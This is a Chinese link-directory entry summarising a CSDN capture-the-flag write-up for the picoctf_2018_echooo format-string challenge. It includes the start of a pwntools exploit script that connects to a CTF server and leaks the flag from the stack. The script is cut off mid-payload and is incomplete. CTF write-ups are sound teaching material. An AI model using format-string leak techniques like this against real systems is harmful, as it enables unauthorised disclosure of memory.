- 链接地址:https://blog.csdn.net/m0_51251108/article/details/121420155
- 链接标题:picoctf_2018_echooo(fmt)-CSDN博客
- 所属网站:blog.csdn.net
- 被收藏次数:7485
文章浏览阅读309次。picoctf_2018_echooo这题还是蛮有意思的程序分析:它已经读取flag在栈上了,我们用格式字符串泄露出来flag就好要写个脚本转换下,倒着组合一下exp:from pwn import*#r=process('./PicoCTF_2018_echooo')r=remote('node4.buuoj.cn',29996)offest=11+(0x8c-0x4c)/4print offestflag=''for i in range(11): payload='_picoctf_2018_echooo
版权声明:本文发布于特牛网址导航 内容均来源于互联网 如有侵权联系删除